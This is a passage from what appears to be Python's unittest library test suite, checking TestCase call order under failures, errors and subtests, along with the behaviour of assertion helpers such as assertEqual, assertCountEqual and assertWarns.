# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test signals
# a failure (as opposed to an error).
def test_run_call_order__failure_in_test(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
self.fail('raised by Foo.test')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addFailure', 'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
# "When a test fails with a default result stopTestRun is still called."
def test_run_call_order__failure_in_test_default_result(self):
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def test(self):
super(Foo, self).test()
self.fail('raised by Foo.test')
expected = ['startTestRun', 'startTest', 'setUp', 'test',
'tearDown', 'addFailure', 'stopTest', 'stopTestRun']
events = []
Foo(events).run()
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if tearDown() raises
# an exception.
def test_run_call_order__error_in_tearDown(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def tearDown(self):
super(Foo, self).tearDown()
raise RuntimeError('raised by Foo.tearDown')
Foo(events).run(result)
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addError',
'stopTest']
self.assertEqual(events, expected)
# "When tearDown errors with a default result stopTestRun is still called."
def test_run_call_order__error_in_tearDown_default_result(self):
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def tearDown(self):
super(Foo, self).tearDown()
raise RuntimeError('raised by Foo.tearDown')
events = []
Foo(events).run()
expected = ['startTestRun', 'startTest', 'setUp', 'test', 'tearDown',
'addError', 'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "TestCase.run() still works when the defaultTestResult is a TestResult
# that does not support startTestRun and stopTestRun.
def test_run_call_order_default_result(self):
class Foo(unittest.TestCase):
def defaultTestResult(self):
return ResultWithNoStartTestRunStopTestRun()
def test(self):
pass
Foo('test').run()
def _check_call_order__subtests(self, result, events, expected_events):
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
for i in [1, 2, 3]:
with self.subTest(i=i):
if i == 1:
self.fail('failure')
for j in [2, 3]:
with self.subTest(j=j):
if i * j == 6:
raise RuntimeError('raised by Foo.test')
1 / 0
# Order is the following:
# i=1 => subtest failure
# i=2, j=2 => subtest success
# i=2, j=3 => subtest error
# i=3, j=2 => subtest error
# i=3, j=3 => subtest success
# toplevel => error
Foo(events).run(result)
self.assertEqual(events, expected_events)
def test_run_call_order__subtests(self):
events = []
result = LoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSubTestFailure', 'addSubTestSuccess',
'addSubTestFailure', 'addSubTestFailure',
'addSubTestSuccess', 'addError', 'stopTest']
self._check_call_order__subtests(result, events, expected)
def test_run_call_order__subtests_legacy(self):
# With a legacy result object (without a addSubTest method),
# text execution stops after the first subtest failure.
events = []
result = LegacyLoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addFailure', 'stopTest']
self._check_call_order__subtests(result, events, expected)
def _check_call_order__subtests_success(self, result, events, expected_events):
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
for i in [1, 2]:
with self.subTest(i=i):
for j in [2, 3]:
with self.subTest(j=j):
pass
Foo(events).run(result)
self.assertEqual(events, expected_events)
def test_run_call_order__subtests_success(self):
events = []
result = LoggingResult(events)
# The 6 subtest successes are individually recorded, in addition
# to the whole test success.
expected = (['startTest', 'setUp', 'test', 'tearDown']
+ 6 * ['addSubTestSuccess']
+ ['addSuccess', 'stopTest'])
self._check_call_order__subtests_success(result, events, expected)
def test_run_call_order__subtests_success_legacy(self):
# With a legacy result, only the whole test success is recorded.
events = []
result = LegacyLoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSuccess', 'stopTest']
self._check_call_order__subtests_success(result, events, expected)
def test_run_call_order__subtests_failfast(self):
events = []
result = LoggingResult(events)
result.failfast = True
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
with self.subTest(i=1):
self.fail('failure')
with self.subTest(i=2):
self.fail('failure')
self.fail('failure')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSubTestFailure', 'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
def test_subtests_failfast(self):
# Ensure proper test flow with subtests and failfast (issue #22894)
events = []
class Foo(unittest.TestCase):
def test_a(self):
with self.subTest():
events.append('a1')
events.append('a2')
def test_b(self):
with self.subTest():
events.append('b1')
with self.subTest():
self.fail('failure')
events.append('b2')
def test_c(self):
events.append('c')
result = unittest.TestResult()
result.failfast = True
suite = unittest.makeSuite(Foo)
suite.run(result)
expected = ['a1', 'a2', 'b1']
self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework. The initial value of this
# attribute is AssertionError"
def test_failureException__default(self):
class Foo(unittest.TestCase):
def test(self):
pass
self.assertIs(Foo('test').failureException, AssertionError)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
def test_failureException__subclassing__explicit_raise(self):
events = []
result = LoggingResult(events)
class Foo(unittest.TestCase):
def test(self):
raise RuntimeError()
failureException = RuntimeError
self.assertIs(Foo('test').failureException, RuntimeError)
Foo('test').run(result)
expected = ['startTest', 'addFailure', 'stopTest']
self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
def test_failureException__subclassing__implicit_raise(self):
events = []
result = LoggingResult(events)
class Foo(unittest.TestCase):
def test(self):
self.fail("foo")
failureException = RuntimeError
self.assertIs(Foo('test').failureException, RuntimeError)
Foo('test').run(result)
expected = ['startTest', 'addFailure', 'stopTest']
self.assertEqual(events, expected)
# "The default implementation does nothing."
def test_setUp(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
# ... and nothing should happen
Foo().setUp()
# "The default implementation does nothing."
def test_tearDown(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
# ... and nothing should happen
Foo().tearDown()
# "Return a string identifying the specific test case."
#
# Because of the vague nature of the docs, I'm not going to lock this
# test down too much. Really all that can be asserted is that the id()
# will be a string (either 8-byte or unicode -- again, because the docs
# just say "string")
def test_id(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
self.assertIsInstance(Foo().id(), str)
# "If result is omitted or None, a temporary result object is created,
# used, and is made available to the caller. As TestCase owns the
# temporary result startTestRun and stopTestRun are called.
def test_run__uses_defaultTestResult(self):
events = []
defaultResult = LoggingResult(events)
class Foo(unittest.TestCase):
def test(self):
events.append('test')
def defaultTestResult(self):
return defaultResult
# Make run() find a result object on its own
result = Foo('test').run()
self.assertIs(result, defaultResult)
expected = ['startTestRun', 'startTest', 'test', 'addSuccess',
'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "The result object is returned to run's caller"
def test_run__returns_given_result(self):
class Foo(unittest.TestCase):
def test(self):
pass
result = unittest.TestResult()
retval = Foo('test').run(result)
self.assertIs(retval, result)
# "The same effect [as method run] may be had by simply calling the
# TestCase instance."
def test_call__invoking_an_instance_delegates_to_run(self):
resultIn = unittest.TestResult()
resultOut = unittest.TestResult()
class Foo(unittest.TestCase):
def test(self):
pass
def run(self, result):
self.assertIs(result, resultIn)
return resultOut
retval = Foo('test')(resultIn)
self.assertIs(retval, resultOut)
def testShortDescriptionWithoutDocstring(self):
self.assertIsNone(self.shortDescription())
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testShortDescriptionWithOneLineDocstring(self):
"""Tests shortDescription() for a method with a docstring."""
self.assertEqual(
self.shortDescription(),
'Tests shortDescription() for a method with a docstring.')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testShortDescriptionWithMultiLineDocstring(self):
"""Tests shortDescription() for a method with a longer docstring.
This method ensures that only the first line of a docstring is
returned used in the short description, no matter how long the
whole thing is.
"""
self.assertEqual(
self.shortDescription(),
'Tests shortDescription() for a method with a longer '
'docstring.')
def testAddTypeEqualityFunc(self):
class SadSnake(object):
"""Dummy class for test_addTypeEqualityFunc."""
s1, s2 = SadSnake(), SadSnake()
self.assertFalse(s1 == s2)
def AllSnakesCreatedEqual(a, b, msg=None):
return type(a) == type(b) == SadSnake
self.addTypeEqualityFunc(SadSnake, AllSnakesCreatedEqual)
self.assertEqual(s1, s2)
# No this doesn't clean up and remove the SadSnake equality func
# from this TestCase instance but since its a local nothing else
# will ever notice that.
def testAssertIs(self):
thing = object()
self.assertIs(thing, thing)
self.assertRaises(self.failureException, self.assertIs, thing, object())
def testAssertIsNot(self):
thing = object()
self.assertIsNot(thing, object())
self.assertRaises(self.failureException, self.assertIsNot, thing, thing)
def testAssertIsInstance(self):
thing = []
self.assertIsInstance(thing, list)
self.assertRaises(self.failureException, self.assertIsInstance,
thing, dict)
def testAssertNotIsInstance(self):
thing = []
self.assertNotIsInstance(thing, dict)
self.assertRaises(self.failureException, self.assertNotIsInstance,
thing, list)
def testAssertIn(self):
animals = {'monkey': 'banana', 'cow': 'grass', 'seal': 'fish'}
self.assertIn('a', 'abc')
self.assertIn(2, [1, 2, 3])
self.assertIn('monkey', animals)
self.assertNotIn('d', 'abc')
self.assertNotIn(0, [1, 2, 3])
self.assertNotIn('otter', animals)
self.assertRaises(self.failureException, self.assertIn, 'x', 'abc')
self.assertRaises(self.failureException, self.assertIn, 4, [1, 2, 3])
self.assertRaises(self.failureException, self.assertIn, 'elephant',
animals)
self.assertRaises(self.failureException, self.assertNotIn, 'c', 'abc')
self.assertRaises(self.failureException, self.assertNotIn, 1, [1, 2, 3])
self.assertRaises(self.failureException, self.assertNotIn, 'cow',
animals)
def testAssertDictContainsSubset(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertDictContainsSubset({}, {})
self.assertDictContainsSubset({}, {'a': 1})
self.assertDictContainsSubset({'a': 1}, {'a': 1})
self.assertDictContainsSubset({'a': 1}, {'a': 1, 'b': 2})
self.assertDictContainsSubset({'a': 1, 'b': 2}, {'a': 1, 'b': 2})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({1: "one"}, {})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'a': 2}, {'a': 1})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'c': 1}, {'a': 1})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'a': 1, 'c': 1}, {'a': 1})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'a': 1, 'c': 1}, {'a': 1})
one = ''.join(chr(i) for i in range(255))
# this used to cause a UnicodeDecodeError constructing the failure msg
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'foo': one}, {'foo': '\uFFFD'})
def testAssertEqual(self):
equal_pairs = [
((), ()),
({}, {}),
([], []),
(set(), set()),
(frozenset(), frozenset())]
for a, b in equal_pairs:
# This mess of try excepts is to test the assertEqual behavior
# itself.
try:
self.assertEqual(a, b)
except self.failureException:
self.fail('assertEqual(%r, %r) failed' % (a, b))
try:
self.assertEqual(a, b, msg='foo')
except self.failureException:
self.fail('assertEqual(%r, %r) with msg= failed' % (a, b))
try:
self.assertEqual(a, b, 'foo')
except self.failureException:
self.fail('assertEqual(%r, %r) with third parameter failed' %
(a, b))
unequal_pairs = [
((), []),
({}, set()),
(set([4,1]), frozenset([4,2])),
(frozenset([4,5]), set([2,3])),
(set([3,4]), set([5,4]))]
for a, b in unequal_pairs:
self.assertRaises(self.failureException, self.assertEqual, a, b)
self.assertRaises(self.failureException, self.assertEqual, a, b,
'foo')
self.assertRaises(self.failureException, self.assertEqual, a, b,
msg='foo')
def testEquality(self):
self.assertListEqual([], [])
self.assertTupleEqual((), ())
self.assertSequenceEqual([], ())
a = [0, 'a', []]
b = []
self.assertRaises(unittest.TestCase.failureException,
self.assertListEqual, a, b)
self.assertRaises(unittest.TestCase.failureException,
self.assertListEqual, tuple(a), tuple(b))
self.assertRaises(unittest.TestCase.failureException,
self.assertSequenceEqual, a, tuple(b))
b.extend(a)
self.assertListEqual(a, b)
self.assertTupleEqual(tuple(a), tuple(b))
self.assertSequenceEqual(a, tuple(b))
self.assertSequenceEqual(tuple(a), b)
self.assertRaises(self.failureException, self.assertListEqual,
a, tuple(b))
self.assertRaises(self.failureException, self.assertTupleEqual,
tuple(a), b)
self.assertRaises(self.failureException, self.assertListEqual, None, b)
self.assertRaises(self.failureException, self.assertTupleEqual, None,
tuple(b))
self.assertRaises(self.failureException, self.assertSequenceEqual,
None, tuple(b))
self.assertRaises(self.failureException, self.assertListEqual, 1, 1)
self.assertRaises(self.failureException, self.assertTupleEqual, 1, 1)
self.assertRaises(self.failureException, self.assertSequenceEqual,
1, 1)
self.assertDictEqual({}, {})
c = { 'x': 1 }
d = {}
self.assertRaises(unittest.TestCase.failureException,
self.assertDictEqual, c, d)
d.update(c)
self.assertDictEqual(c, d)
d['x'] = 0
self.assertRaises(unittest.TestCase.failureException,
self.assertDictEqual, c, d, 'These are unequal')
self.assertRaises(self.failureException, self.assertDictEqual, None, d)
self.assertRaises(self.failureException, self.assertDictEqual, [], d)
self.assertRaises(self.failureException, self.assertDictEqual, 1, 1)
def testAssertSequenceEqualMaxDiff(self):
self.assertEqual(self.maxDiff, 80*8)
seq1 = 'a' + 'x' * 80**2
seq2 = 'b' + 'x' * 80**2
diff = '\n'.join(difflib.ndiff(pprint.pformat(seq1).splitlines(),
pprint.pformat(seq2).splitlines()))
# the +1 is the leading \n added by assertSequenceEqual
omitted = unittest.case.DIFF_OMITTED % (len(diff) + 1,)
self.maxDiff = len(diff)//2
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException as e:
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertLess(len(msg), len(diff))
self.assertIn(omitted, msg)
self.maxDiff = len(diff) * 2
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException as e:
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertGreater(len(msg), len(diff))
self.assertNotIn(omitted, msg)
self.maxDiff = None
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException as e:
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertGreater(len(msg), len(diff))
self.assertNotIn(omitted, msg)
def testTruncateMessage(self):
self.maxDiff = 1
message = self._truncateMessage('foo', 'bar')
omitted = unittest.case.DIFF_OMITTED % len('bar')
self.assertEqual(message, 'foo' + omitted)
self.maxDiff = None
message = self._truncateMessage('foo', 'bar')
self.assertEqual(message, 'foobar')
self.maxDiff = 4
message = self._truncateMessage('foo', 'bar')
self.assertEqual(message, 'foobar')
def testAssertDictEqualTruncates(self):
test = unittest.TestCase('assertEqual')
def truncate(msg, diff):
return 'foo'
test._truncateMessage = truncate
try:
test.assertDictEqual({}, {1: 0})
except self.failureException as e:
self.assertEqual(str(e), 'foo')
else:
self.fail('assertDictEqual did not fail')
def testAssertMultiLineEqualTruncates(self):
test = unittest.TestCase('assertEqual')
def truncate(msg, diff):
return 'foo'
test._truncateMessage = truncate
try:
test.assertMultiLineEqual('foo', 'bar')
except self.failureException as e:
self.assertEqual(str(e), 'foo')
else:
self.fail('assertMultiLineEqual did not fail')
def testAssertEqual_diffThreshold(self):
# check threshold value
self.assertEqual(self._diffThreshold, 2**16)
# disable madDiff to get diff markers
self.maxDiff = None
# set a lower threshold value and add a cleanup to restore it
old_threshold = self._diffThreshold
self._diffThreshold = 2**5
self.addCleanup(lambda: setattr(self, '_diffThreshold', old_threshold))
# under the threshold: diff marker (^) in error message
s = 'x' * (2**4)
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s + 'a', s + 'b')
self.assertIn('^', str(cm.exception))
self.assertEqual(s + 'a', s + 'a')
# over the threshold: diff not used and marker (^) not in error message
s = 'x' * (2**6)
# if the path that uses difflib is taken, _truncateMessage will be
# called -- replace it with explodingTruncation to verify that this
# doesn't happen
def explodingTruncation(message, diff):
raise SystemError('this should not be raised')
old_truncate = self._truncateMessage
self._truncateMessage = explodingTruncation
self.addCleanup(lambda: setattr(self, '_truncateMessage', old_truncate))
s1, s2 = s + 'a', s + 'b'
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
self.assertNotIn('^', str(cm.exception))
self.assertEqual(str(cm.exception), '%r != %r' % (s1, s2))
self.assertEqual(s + 'a', s + 'a')
def testAssertEqual_shorten(self):
# set a lower threshold value and add a cleanup to restore it
old_threshold = self._diffThreshold
self._diffThreshold = 0
self.addCleanup(lambda: setattr(self, '_diffThreshold', old_threshold))
s = 'x' * 100
s1, s2 = s + 'a', s + 'b'
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[35 chars]' + 'x' * 61
self.assertEqual(str(cm.exception), "'%sa' != '%sb'" % (c, c))
self.assertEqual(s + 'a', s + 'a')
p = 'y' * 50
s1, s2 = s + 'a' + p, s + 'b' + p
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[85 chars]xxxxxxxxxxx'
self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, p, c, p))
p = 'y' * 100
s1, s2 = s + 'a' + p, s + 'b' + p
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[91 chars]xxxxx'
d = 'y' * 40 + '[56 chars]yyyy'
self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, d, c, d))
def testAssertCountEqual(self):
a = object()
self.assertCountEqual([1, 2, 3], [3, 2, 1])
self.assertCountEqual(['foo', 'bar', 'baz'], ['bar', 'baz', 'foo'])
self.assertCountEqual([a, a, 2, 2, 3], (a, 2, 3, a, 2))
self.assertCountEqual([1, "2", "a", "a"], ["a", "2", True, "a"])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, 2] + [3] * 100, [1] * 100 + [2, 3])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, "2", "a", "a"], ["a", "2", True, 1])
self.assertRaises(self.failureException, self.assertCountEqual,
[10], [10, 11])
self.assertRaises(self.failureException, self.assertCountEqual,
[10, 11], [10])
self.assertRaises(self.failureException, self.assertCountEqual,
[10, 11, 10], [10, 11])
# Test that sequences of unhashable objects can be tested for sameness:
self.assertCountEqual([[1, 2], [3, 4], 0], [False, [3, 4], [1, 2]])
# Test that iterator of unhashable objects can be tested for sameness:
self.assertCountEqual(iter([1, 2, [], 3, 4]),
iter([1, 2, [], 3, 4]))
# hashable types, but not orderable
self.assertRaises(self.failureException, self.assertCountEqual,
[], [divmod, 'x', 1, 5j, 2j, frozenset()])
# comparing dicts
self.assertCountEqual([{'a': 1}, {'b': 2}], [{'b': 2}, {'a': 1}])
# comparing heterogenous non-hashable sequences
self.assertCountEqual([1, 'x', divmod, []], [divmod, [], 'x', 1])
self.assertRaises(self.failureException, self.assertCountEqual,
[], [divmod, [], 'x', 1, 5j, 2j, set()])
self.assertRaises(self.failureException, self.assertCountEqual,
[[1]], [[2]])
# Same elements, but not same sequence length
self.assertRaises(self.failureException, self.assertCountEqual,
[1, 1, 2], [2, 1])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, 1, "2", "a", "a"], ["2", "2", True, "a"])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, {'b': 2}, None, True], [{'b': 2}, True, None])
# Same elements which don't reliably compare, in
# different order, see issue 10242
a = [{2,4}, {1,2}]
b = a[::-1]
self.assertCountEqual(a, b)
# test utility functions supporting assertCountEqual()
diffs = set(unittest.util._count_diff_all_purpose('aaabccd', 'abbbcce'))
expected = {(3,1,'a'), (1,3,'b'), (1,0,'d'), (0,1,'e')}
self.assertEqual(diffs, expected)
diffs = unittest.util._count_diff_all_purpose([[]], [])
self.assertEqual(diffs, [(1, 0, [])])
diffs = set(unittest.util._count_diff_hashable('aaabccd', 'abbbcce'))
expected = {(3,1,'a'), (1,3,'b'), (1,0,'d'), (0,1,'e')}
self.assertEqual(diffs, expected)
def testAssertSetEqual(self):
set1 = set()
set2 = set()
self.assertSetEqual(set1, set2)
self.assertRaises(self.failureException, self.assertSetEqual, None, set2)
self.assertRaises(self.failureException, self.assertSetEqual, [], set2)
self.assertRaises(self.failureException, self.assertSetEqual, set1, None)
self.assertRaises(self.failureException, self.assertSetEqual, set1, [])
set1 = set(['a'])
set2 = set()
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a'])
set2 = set(['a'])
self.assertSetEqual(set1, set2)
set1 = set(['a'])
set2 = set(['a', 'b'])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a'])
set2 = frozenset(['a', 'b'])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a', 'b'])
set2 = frozenset(['a', 'b'])
self.assertSetEqual(set1, set2)
set1 = set()
set2 = "foo"
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
self.assertRaises(self.failureException, self.assertSetEqual, set2, set1)
# make sure any string formatting is tuple-safe
set1 = set([(0, 1), (2, 3)])
set2 = set([(4, 5)])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
def testInequality(self):
# Try ints
self.assertGreater(2, 1)
self.assertGreaterEqual(2, 1)
self.assertGreaterEqual(1, 1)
self.assertLess(1, 2)
self.assertLessEqual(1, 2)
self.assertLessEqual(1, 1)
self.assertRaises(self.failureException, self.assertGreater, 1, 2)
self.assertRaises(self.failureException, self.assertGreater, 1, 1)
self.assertRaises(self.failureException, self.assertGreaterEqual, 1, 2)
self.assertRaises(self.failureException, self.assertLess, 2, 1)
self.assertRaises(self.failureException, self.assertLess, 1, 1)
self.assertRaises(self.failureException, self.assertLessEqual, 2, 1)
# Try Floats
self.assertGreater(1.1, 1.0)
self.assertGreaterEqual(1.1, 1.0)
self.assertGreaterEqual(1.0, 1.0)
self.assertLess(1.0, 1.1)
self.assertLessEqual(1.0, 1.1)
self.assertLessEqual(1.0, 1.0)
self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.1)
self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.0)
self.assertRaises(self.failureException, self.assertGreaterEqual, 1.0, 1.1)
self.assertRaises(self.failureException, self.assertLess, 1.1, 1.0)
self.assertRaises(self.failureException, self.assertLess, 1.0, 1.0)
self.assertRaises(self.failureException, self.assertLessEqual, 1.1, 1.0)
# Try Strings
self.assertGreater('bug', 'ant')
self.assertGreaterEqual('bug', 'ant')
self.assertGreaterEqual('ant', 'ant')
self.assertLess('ant', 'bug')
self.assertLessEqual('ant', 'bug')
self.assertLessEqual('ant', 'ant')
self.assertRaises(self.failureException, self.assertGreater, 'ant', 'bug')
self.assertRaises(self.failureException, self.assertGreater, 'ant', 'ant')
self.assertRaises(self.failureException, self.assertGreaterEqual, 'ant', 'bug')
self.assertRaises(self.failureException, self.assertLess, 'bug', 'ant')
self.assertRaises(self.failureException, self.assertLess, 'ant', 'ant')
self.assertRaises(self.failureException, self.assertLessEqual, 'bug', 'ant')
# Try bytes
self.assertGreater(b'bug', b'ant')
self.assertGreaterEqual(b'bug', b'ant')
self.assertGreaterEqual(b'ant', b'ant')
self.assertLess(b'ant', b'bug')
self.assertLessEqual(b'ant', b'bug')
self.assertLessEqual(b'ant', b'ant')
self.assertRaises(self.failureException, self.assertGreater, b'ant', b'bug')
self.assertRaises(self.failureException, self.assertGreater, b'ant', b'ant')
self.assertRaises(self.failureException, self.assertGreaterEqual, b'ant',
b'bug')
self.assertRaises(self.failureException, self.assertLess, b'bug', b'ant')
self.assertRaises(self.failureException, self.assertLess, b'ant', b'ant')
self.assertRaises(self.failureException, self.assertLessEqual, b'bug', b'ant')
def testAssertMultiLineEqual(self):
sample_text = """\
http://www.python.org/doc/2.3/lib/module-unittest.html
test case
A test case is the smallest unit of testing. [...]
"""
revised_sample_text = """\
http://www.python.org/doc/2.4.1/lib/module-unittest.html
test case
A test case is the smallest unit of testing. [...] You may provide your
own implementation that does not subclass from TestCase, of course.
"""
sample_text_error = """\
- http://www.python.org/doc/2.3/lib/module-unittest.html
? ^
+ http://www.python.org/doc/2.4.1/lib/module-unittest.html
? ^^^
test case
- A test case is the smallest unit of testing. [...]
+ A test case is the smallest unit of testing. [...] You may provide your
? +++++++++++++++++++++
+ own implementation that does not subclass from TestCase, of course.
"""
self.maxDiff = None
try:
self.assertMultiLineEqual(sample_text, revised_sample_text)
except self.failureException as e:
# need to remove the first line of the error message
error = str(e).split('\n', 1)[1]
# no fair testing ourself with ourself, and assertEqual is used for strings
# so can't use assertEqual either. Just use assertTrue.
self.assertTrue(sample_text_error == error)
def testAsertEqualSingleLine(self):
sample_text = "laden swallows fly slowly"
revised_sample_text = "unladen swallows fly quickly"
sample_text_error = """\
- laden swallows fly slowly
? ^^^^
+ unladen swallows fly quickly
? ++ ^^^^^
"""
try:
self.assertEqual(sample_text, revised_sample_text)
except self.failureException as e:
error = str(e).split('\n', 1)[1]
self.assertTrue(sample_text_error == error)
def testAssertIsNone(self):
self.assertIsNone(None)
self.assertRaises(self.failureException, self.assertIsNone, False)
self.assertIsNotNone('DjZoPloGears on Rails')
self.assertRaises(self.failureException, self.assertIsNotNone, None)
def testAssertRegex(self):
self.assertRegex('asdfabasdf', r'ab+')
self.assertRaises(self.failureException, self.assertRegex,
'saaas', r'aaaa')
def testAssertRaisesRegex(self):
class ExceptionMock(Exception):
pass
def Stub():
raise ExceptionMock('We expect')
self.assertRaisesRegex(ExceptionMock, re.compile('expect$'), Stub)
self.assertRaisesRegex(ExceptionMock, 'expect$', Stub)
def testAssertNotRaisesRegex(self):
self.assertRaisesRegex(
self.failureException, '^Exception not raised by <lambda>$',
self.assertRaisesRegex, Exception, re.compile('x'),
lambda: None)
self.assertRaisesRegex(
self.failureException, '^Exception not raised by <lambda>$',
self.assertRaisesRegex, Exception, 'x',
lambda: None)
def testAssertRaisesRegexInvalidRegex(self):
# Issue 20145.
class MyExc(Exception):
pass
self.assertRaises(TypeError, self.assertRaisesRegex, MyExc, lambda: True)
def testAssertWarnsRegexInvalidRegex(self):
# Issue 20145.
class MyWarn(Warning):
pass
self.assertRaises(TypeError, self.assertWarnsRegex, MyWarn, lambda: True)
def testAssertRaisesRegexMismatch(self):
def Stub():
raise Exception('Unexpected')
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception, '^Expected$',
Stub)
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception,
re.compile('^Expected$'), Stub)
def testAssertRaisesExcValue(self):
class ExceptionMock(Exception):
pass
def Stub(foo):
raise ExceptionMock(foo)
v = "particular value"
ctx = self.assertRaises(ExceptionMock)
with ctx:
Stub(v)
e = ctx.exception
self.assertIsInstance(e, ExceptionMock)
self.assertEqual(e.args[0], v)
def testAssertWarnsCallable(self):
def _runtime_warn():
warnings.warn("foo", RuntimeWarning)
# Success when the right warning is triggered, even several times
self.assertWarns(RuntimeWarning, _runtime_warn)
self.assertWarns(RuntimeWarning, _runtime_warn)
# A tuple of warning classes is accepted
self.assertWarns((DeprecationWarning, RuntimeWarning), _runtime_warn)
# *args and **kwargs also work
self.assertWarns(RuntimeWarning,
warnings.warn, "foo", category=RuntimeWarning)
# Failure when no warning is triggered
with self.assertRaises(self.failureException):
self.assertWarns(RuntimeWarning, lambda: 0)
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
self.assertWarns(DeprecationWarning, _runtime_warn)
# Filters for other warnings are not modified
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises(RuntimeWarning):
self.assertWarns(DeprecationWarning, _runtime_warn)
def testAssertWarnsContext(self):
# Believe it or not, it is preferable to duplicate all tests above,
# to make sure the __warningregistry__ $@ is circumvented correctly.
def _runtime_warn():
warnings.warn("foo", RuntimeWarning)
_runtime_warn_lineno = inspect.getsourcelines(_runtime_warn)[1]
with self.assertWarns(RuntimeWarning) as cm:
_runtime_warn()
# A tuple of warning classes is accepted
with self.assertWarns((DeprecationWarning, RuntimeWarning)) as cm:
_runtime_warn()
# The context manager exposes various useful attributes
self.assertIsInstance(cm.warning, RuntimeWarning)
self.assertEqual(cm.warning.args[0], "foo")
self.assertIn("test_case.py", cm.filename)
self.assertEqual(cm.lineno, _runtime_warn_lineno + 1)
# Same with several warnings
with self.assertWarns(RuntimeWarning):
_runtime_warn()
_runtime_warn()
with self.assertWarns(RuntimeWarning):
warnings.warn("foo", category=RuntimeWarning)
# Failure when no warning is triggered
with self.assertRaises(self.failureException):
with self.assertWarns(RuntimeWarning):
pass
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
with self.assertWarns(DeprecationWarning):
_runtime_warn()
# Filters for other warnings are not modified
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises(RuntimeWarning):
with self.assertWarns(DeprecationWarning):
_runtime_warn()
def testAssertWarnsRegexCallable(self):
def _runtime_warn(msg):
warnings.warn(msg, RuntimeWarning)
self.assertWarnsRegex(RuntimeWarning, "o+",
_runtime_warn, "foox")
